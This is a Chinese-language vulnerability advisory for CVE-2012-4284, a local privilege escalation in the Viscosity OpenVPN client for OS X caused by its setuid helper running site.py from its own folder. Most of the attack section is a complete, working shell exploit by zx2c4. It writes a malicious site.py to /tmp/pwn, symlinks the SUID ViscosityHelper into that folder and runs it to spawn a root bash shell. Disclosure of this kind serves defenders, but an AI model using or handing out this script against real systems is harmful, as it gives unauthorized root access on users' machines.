OS X Viscosity OpenVPN客户端本地权限提升漏洞
发布日期:2012-08-12
更新日期:2012-08-12
受影响系统:Viscosity Viscosity
描述:
CVE(CAN) ID:
CVE-2012-4284
Viscosity是针对Mac&Windows平台的OpenVPN客户端。
Viscosity在实现上存在权限提升漏洞,此漏洞源于setuid-set ViscosityHelper二进制不安全地执行任意脚本。本地攻击者利用符号链接攻击利用此漏洞可获取提升的权限。
<*来源:Jason A. Donenfeld
链接:
http://osvdb.org/show/osvdb/84709
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/bin/sh
#
##########################
# Viscatory #
# #
# zx2c4 #
##########################
#
# After the hullabaloo from the Tunnelblick local root, savy Mac users
# began defending Viscosity, another OS X VPN client. They figured, since
# they spent money on Viscosity, surely it would be better designed than
# the free open-source alternative.
#
# Unfortunately, this exploit took all of 2 minutes to find. DTrace for
# the win. Here, the SUID helper will execute site.py in its enclosing
# folder. A simple symlink, and we have root.
#
# greets to jono
#
# Source:
http://git.zx2c4.com/Viscatory/tree/viscatory.sh
echo "[+] Crafting payload."
mkdir -p -v /tmp/pwn
cat > /tmp/pwn/site.py <<_EOF
import os
print "[+] Cleaning up."
os.system("rm -rvf /tmp/pwn")
print "[+] Getting root."
os.setuid(0)
os.setgid(0)
os.execl("/bin/bash", "bash")
_EOF
echo "[+] Making symlink."
ln -s -f -v /Applications/Viscosity.app/Contents/Resources/ViscosityHelper /tmp/pwn/root
echo "[+] Running vulnerable SUID helper."
exec /tmp/pwn/root
建议:
厂商补丁:
Viscosity
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.thesparklabs.com/viscosity/浏览次数:1329
严重程度:0(网友投票)
